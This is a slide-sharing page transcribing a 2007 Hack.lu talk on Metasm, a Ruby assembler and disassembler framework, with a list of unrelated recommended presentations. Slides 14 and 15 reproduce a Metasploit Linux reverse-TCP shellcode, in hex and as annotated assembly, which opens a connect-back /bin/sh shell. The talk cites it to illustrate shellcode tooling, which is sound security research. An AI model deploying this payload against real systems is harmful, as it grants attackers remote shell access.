metasm
play

Metasm a ruby (dis)assembler Yoann Guillot 20 october 2007 Metasm - PowerPoint PPT Presentation

Oct 04, 2022 •444 likes •708 views

Metasm a ruby (dis)assembler Yoann Guillot 20 october 2007 Metasm Demonstrations Presentation I am Yoann Guillot I work for Sogeti/ESEC in the security R&D lab Metasm HACK.LU 2007 2 / 23 Architecture overview Assembly Disassembly

  1. Metasm a ruby (dis)assembler Yoann Guillot 20 october 2007

  2. Metasm Demonstrations Presentation I am Yoann Guillot I work for Sogeti/ESEC in the security R&D lab Metasm HACK.LU 2007 2 / 23

  3. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Plan 1 Metasm Architecture overview Assembly Disassembly Executable file handling C compiler Live process interaction Use cases Metasploit 3 2 Demonstrations Metasm HACK.LU 2007 3 / 23

  4. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Introduction Metasm is a full-Ruby standalone framework To manipulate machine code (static or dynamic) Multi-CPU (Ia32/MIPS for now) Multi-OS (Windows/Linux) distributed under the open-source LGPL license http://metasm.cr0.org/ still under heavy developpement Metasm HACK.LU 2007 4 / 23

  5. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Architecture overview Metasm HACK.LU 2007 5 / 23

  6. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Assembly EncodedData represents a relocatable binary string binary data arbitrary relocations exports virtual size used to dissociate assembly from linking Metasm HACK.LU 2007 6 / 23

  7. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Assembly mov eax, dword ptr [toto] Metasm HACK.LU 2007 7 / 23

  8. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Disassembly simple yet powerful backtracking engine emulates standard CPU instructions follows precisely code flow currently unfinished trace data access handle subfunctions handle external API calls minimal arch-specific developpement Metasm HACK.LU 2007 8 / 23

  9. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Handling executable files reading from a file directly in memory writing from scratch patch an existing exe currently supported formats: MZ / PE / COFF, ELF / a.out Metasm HACK.LU 2007 9 / 23

  10. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 C Compilation Metasm includes a complete C parser features header filtering basic compiler for Ia32 Metasm HACK.LU 2007 10 / 23

  11. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Live process interaction String-like process memory abstraction transparent read/write Ruby objects wrap the host OS debug API Metasm HACK.LU 2007 11 / 23

  12. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 When is it useful whenever you want to manipulate machine code or executable files it’s easy to hook/rewrite/customize any internal method Metasm HACK.LU 2007 12 / 23

  13. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Metasploit 3 - before Metasploit 3 is also written in Ruby it had very bad machine code support hexadecimal static shellcodes hacks to patch the shellcodes with user-specified values more hacks to link stages Metasm HACK.LU 2007 13 / 23

  14. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Metasploit 3 - before [metasploit3/.../reverse tcp.rb] ’Payload’ => { ’Offsets’ => { ’LHOST’ => [ 0x1a, ’ADDR’ ], ’LPORT’ => [ 0x20, ’n’ ], }, ’Payload’ => "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" + "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" + "\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" + "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xb0\x0b\xcd\x80" } Metasm HACK.LU 2007 14 / 23

  15. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Metasploit 3 - now [metasploit3/.../reverse tcp2.rb] ’Payload’ => { ’Offsets’ => { ’LHOST’ => [ 0, ’ADDR’ ], ’LPORT’ => [ 0, ’n’ ], }, ’Assembly’ => <<EOS xor ebx, ebx ; @00000000 31db [...] pop edx ; @00000018 5a push LHOST ; @00000019 687f000001 push.i16 LPORT ; @0000001e 6668bfbf [...] push ’//sh’ push ’/bin’ [...] mov al, 0bh ; @00000042 b00b int 80h ; @00000044 cd80 EOS } Metasm HACK.LU 2007 15 / 23

  16. Architecture overview Assembly Disassembly Metasm Executable file handling Demonstrations C compiler Live process interaction Use cases Metasploit 3 Metasploit 3 - now Metasm is now included in Metasploit shellcodes can be in source from standard Metasm relocation handling may be used for shellcode patching/linking ??? Profit ! Metasm HACK.LU 2007 16 / 23

  17. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Plan 1 Metasm 2 Demonstrations metasm-shell Exe manipulation Live process interaction Metasm HACK.LU 2007 17 / 23

  18. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction metasm-shell metasm-shell adds metasm methods to standard Ruby Strings offers an interactive assembler shell Metasm HACK.LU 2007 18 / 23

  19. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Exe manipulation reading a MIPS ELF Metasm HACK.LU 2007 19 / 23

  20. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Exe manipulation reading a MIPS ELF compiling a simple PE [samples/testpe.rb] Metasm HACK.LU 2007 19 / 23

  21. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Exe manipulation reading a MIPS ELF compiling a simple PE [samples/testpe.rb] patching a PE [samples/pe-hook.rb] Metasm HACK.LU 2007 19 / 23

  22. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Windows process hooking simple IAT hook [samples/win32hooker.rb] Metasm HACK.LU 2007 20 / 23

  23. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Windows process hooking full-library hook [samples/win32hooker-advanced.rb] redirect all exported function to a custom hook Metasm HACK.LU 2007 21 / 23

  24. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Linux debugging ptrace wrapper [samples/rubstop.rb] singlestep, stepover, etc memory access PaX compatible Metasm HACK.LU 2007 22 / 23

  25. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Linux debugging ptrace wrapper [samples/rubstop.rb] singlestep, stepover, etc memory access PaX compatible UI [samples/lindebug.rb] console-mode only (for now) Metasm HACK.LU 2007 22 / 23

  26. metasm-shell Metasm Exe manipulation Demonstrations Live process interaction Conclusion Thanks for listening Questions ? Metasm HACK.LU 2007 23 / 23

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

RECON 2010 - Montreal Metasm Tracer MSR NIC Plan Metasm 1 Tracer 2 MSR 3 NIC 4 A.

RECON 2010 - Montreal Metasm Tracer MSR NIC Plan Metasm 1 Tracer 2 MSR 3 NIC 4 A.

Metasm Feelings Alexandre Gazet Yoann Guillot Sogeti / ESEC R&amp;D Sogeti / ESEC R&amp;D alexandre.gazet(at)sogeti.com yoann.guillot(at)sogeti.com RECON 2010 - Montreal Metasm Tracer MSR NIC Plan Metasm 1 Tracer 2 MSR 3 NIC 4

508 views • 25 slides
D eprotection semi-automatique de binaire avec Metasm : celui qui fond dans la bouche et pas

D eprotection semi-automatique de binaire avec Metasm : celui qui fond dans la bouche et pas

Metasm Manipulation structurelle Challenge T2 2007 Conclusion D eprotection semi-automatique de binaire avec Metasm : celui qui fond dans la bouche et pas dans la main. Alexandre Gazet Yoann Guillot A. Gazet &amp; Y. Guillot D

743 views • 52 slides
HITB 2009 Metasm Debugger Analysis of a protection Compiler Decompilation Disassembler Plan

HITB 2009 Metasm Debugger Analysis of a protection Compiler Decompilation Disassembler Plan

Binary deprotection with metasm and stuff Alexandre Gazet Yoann Guillot Sogeti / ESEC R&amp;D Sogeti / ESEC R&amp;D alexandre.gazet(at)sogeti.com yoann.guillot(at)sogeti.com HITB 2009 Metasm Debugger Analysis of a protection Compiler

767 views • 59 slides
Metasm un framework pour code machine Yoann Guillot Plan Intro Applications Exemples

Metasm un framework pour code machine Yoann Guillot Plan Intro Applications Exemples

Metasm un framework pour code machine Yoann Guillot Plan Intro Applications Exemples Sommaire Prsentation du framework Aperu de larchitecture Fonctionnalits Ce qui devient possible Exemples ( Unrestricted ) Research &amp;

462 views • 17 slides
:i extensions ) characterizations for Galois Thin ( Equivalent - Gal ( EIF ) . Then and

:i extensions ) characterizations for Galois Thin ( Equivalent - Gal ( EIF ) . Then and

Extension , Galois Galois Intermediate I : Extensions lame l Gal LEIF ) t.EE if ] ' tf Galois Elf is :i extensions ) characterizations for Galois Thin ( Equivalent - Gal ( EIF ) . Then and [ E : F) so let G - suppose

1.01k views • 15 slides
Optimizing C For Microcontrollers Khem Raj, Comcast Embedded Linux Conference &amp; IOT summit -

Optimizing C For Microcontrollers Khem Raj, Comcast Embedded Linux Conference &amp; IOT summit -

Optimizing C For Microcontrollers Khem Raj, Comcast Embedded Linux Conference &amp; IOT summit - Portland OR Agenda Introduction Knowing the Tools Data Types and sizes Variable and Function Types Loops Low Level

580 views • 27 slides
The elf in ELF use 0-day to cheat all disassemblers david942j @ CyberSEC 2019 1 . 1 This talk

The elf in ELF use 0-day to cheat all disassemblers david942j @ CyberSEC 2019 1 . 1 This talk

The elf in ELF use 0-day to cheat all disassemblers david942j @ CyberSEC 2019 1 . 1 This talk Tricks to cheat disassemblers objdump, readelf, IDA Pro, etc. 2 . 1 IDA Pro The best tool for reverse-engineering Take it as examples in this

1.16k views • 60 slides
Approximate Query Service on Autonomous IoT Cameras Mengwei Xu 1 , Xiwen Zhang 2 , Yunxin Liu 3

Approximate Query Service on Autonomous IoT Cameras Mengwei Xu 1 , Xiwen Zhang 2 , Yunxin Liu 3

Approximate Query Service on Autonomous IoT Cameras Mengwei Xu 1 , Xiwen Zhang 2 , Yunxin Liu 3 Gang Huang 1 , Xuanzhe Liu 1 , Felix Xiaozhu Lin 2 1 Peking University, 2 Purdue University, 3 Microsoft Research, 1 Video Analytics is a Killer App

984 views • 39 slides
Project 1: Bootloader COS 318 Fall 2016 Project 1: Schedule Design Review - Monday, 9/26 -

Project 1: Bootloader COS 318 Fall 2016 Project 1: Schedule Design Review - Monday, 9/26 -

Project 1: Bootloader COS 318 Fall 2016 Project 1: Schedule Design Review - Monday, 9/26 - 10-min time slots from 1:30pm-9:20pm - Write functions print_char and print_string - Answer the questions: How to move the kernel from disk to

835 views • 27 slides
Binary compatibility on NetBSD Emmanuel Dreyfus, july 2014 About me Emmanuel Dreyfus

Binary compatibility on NetBSD Emmanuel Dreyfus, july 2014 About me Emmanuel Dreyfus

Binary compatibility on NetBSD Emmanuel Dreyfus, july 2014 About me Emmanuel Dreyfus &lt;manu@netbsd.org&gt; IT manager at ESPCI ParisTech as daylight job NetBSD contributor since 2001 Milter-greylist since 2006 OpenLDAP,

589 views • 22 slides
&amp; Process Address Space Nima Honarmand Spring 2017 :: CSE 506 Virtual Memory (VM) Recap

&amp; Process Address Space Nima Honarmand Spring 2017 :: CSE 506 Virtual Memory (VM) Recap

Spring 2017 :: CSE 506 Virtual Memory &amp; Process Address Space Nima Honarmand Spring 2017 :: CSE 506 Virtual Memory (VM) Recap Primary purpose? Isolate each process to its own address space Components Address translation

716 views • 36 slides
Arm cross development tools the GNU C compiler, binutils and glibc can be configured to target the

Arm cross development tools the GNU C compiler, binutils and glibc can be configured to target the

slide 1 gaius Arm cross development tools the GNU C compiler, binutils and glibc can be configured to target the arm series of microprocessors Raspberry Pi uses an arm11 processor processor runs at 700Mhz cross development tools are much

193 views • 17 slides
Linking Eric McCreath Introduction One of the key resources that an operating system is called

Linking Eric McCreath Introduction One of the key resources that an operating system is called

Linking Eric McCreath Introduction One of the key resources that an operating system is called upon to manage is main (primary) memory. Generally a programer does not have to worry about which particular addresses are used for their programs.

735 views • 7 slides
The Usefulness of Sparsifiable Inputs: How to Avoid Subexponential iO Thomas Agrikola 1 Geoffroy

The Usefulness of Sparsifiable Inputs: How to Avoid Subexponential iO Thomas Agrikola 1 Geoffroy

The Usefulness of Sparsifiable Inputs: How to Avoid Subexponential iO Thomas Agrikola 1 Geoffroy Couteau 2 Dennis Hofheinz 3 1 Karlsruhe Institute of Technology (KIT), Germany 2 IRIF, Paris-Diderot University, CNRS, France 3 ETH Zurich, Switzerland

909 views • 47 slides
Embedded Systems Programming ES Development Environment (Module 3) Yann-Hang Lee Arizona State

Embedded Systems Programming ES Development Environment (Module 3) Yann-Hang Lee Arizona State

Embedded Systems Programming ES Development Environment (Module 3) Yann-Hang Lee Arizona State University yhlee@asu.edu (480) 727-7507 Summer 2014 Real-time Systems Lab, Computer Science and Engineering, ASU Embedded System Development

403 views • 11 slides
Santa Claus with Mobile with Mobile Santa Claus with Mobile Santa Claus Reindeer

Santa Claus with Mobile with Mobile Santa Claus with Mobile Santa Claus Reindeer

Santa Claus with Mobile with Mobile Santa Claus with Mobile Santa Claus Reindeer and Elves Reindeer and Elves Reindeer and Elves Peter Welch ( phw@kent.ac.uk ) Matt Pedersen ( matt@faculty.egr.unlv.edu ) CPA 2008 (09/07/2008)

1.27k views • 60 slides
Makefiles CS 2XA3 Term I, 2020/21 Outline Example Calling make Syntax How it works Macros

Makefiles CS 2XA3 Term I, 2020/21 Outline Example Calling make Syntax How it works Macros

Makefiles CS 2XA3 Term I, 2020/21 Outline Example Calling make Syntax How it works Macros Suffix rules Command line options Example Assume we have files main.c , test.c , and lo.asm Consider the makefile program: main.o test.o lo.o gcc

417 views • 19 slides
WEIRD MACHINES IN PROGRAM METADATA: ATTACKS AND DEFENSES NOVEMBER 2013 REBECCA . bx

WEIRD MACHINES IN PROGRAM METADATA: ATTACKS AND DEFENSES NOVEMBER 2013 REBECCA . bx

ANNUAL INDUSTRY WORKSHOP NOVEMBER 6-7, 2013 WEIRD MACHINES IN PROGRAM METADATA: ATTACKS AND DEFENSES NOVEMBER 2013 REBECCA . bx SHAPIRO DARTMOUTH COLLEGE TRUSTWORTHY CYBER INFRASTRUCTURE FOR THE POWER GRID | TCIPG.ORG 1 UNIVERSITY

566 views • 13 slides
Person Re-identification Introduction and Future Trends Shengcai Liao Institute of Automation

Person Re-identification Introduction and Future Trends Shengcai Liao Institute of Automation

Person Re-identification Introduction and Future Trends Shengcai Liao Institute of Automation Chinese Academy of Sciences ICPR 2018 Tutorial Beijing CONTENT Introduction 01 02 Approach 03 Evaluation and Benchmark 04 Future

855 views • 37 slides
in Virtual Environments Representing People Representing People Whats in this lecture?

in Virtual Environments Representing People Representing People Whats in this lecture?

Will Steptoe 30 th November 2010 in Virtual Environments Representing People Representing People Whats in this lecture? Part 1 : Virtual Characters History, Agency, Control in Immersive and Non- History Agency Control in Immersive

1.01k views • 69 slides
AIs in Social Environments CS 278 | Stanford University | Michael Bernstein Announcements

AIs in Social Environments CS 278 | Stanford University | Michael Bernstein Announcements

AIs in Social Environments CS 278 | Stanford University | Michael Bernstein Announcements Project presentations on Wednesday What we care about Final projects due next Tuesday, June 11 Class evaluations now open, feedback welcome 2 Last time

735 views • 39 slides
Introduction to Natural Language Processing CMSC 470 Marine Carpuat Natural Language Processing

Introduction to Natural Language Processing CMSC 470 Marine Carpuat Natural Language Processing

Introduction to Natural Language Processing CMSC 470 Marine Carpuat Natural Language Processing (NLP) The engineering discipline of doing what people do with language, but using computers Computational Linguistics (CL) The science of

934 views • 28 slides
The ShanghAI Lectures An experiment in global teaching Fabio Bonsignorio The BioRobotics

The ShanghAI Lectures An experiment in global teaching Fabio Bonsignorio The BioRobotics

The ShanghAI Lectures An experiment in global teaching Fabio Bonsignorio The BioRobotics Institute, SSSA and Heron Robots Today from the BioRobotics Institute, Pontedera (PI)

557 views • 24 slides
PDSF User Meeting September 1, 2015 Lisa Gerhardt Utilization -

PDSF User Meeting September 1, 2015 Lisa Gerhardt Utilization -

PDSF User Meeting September 1, 2015 Lisa Gerhardt Utilization - 2 - Past Outages 8/12/15 (2 days): NERSC system wide outage from power event Planned

198 views • 8 slides

More recommend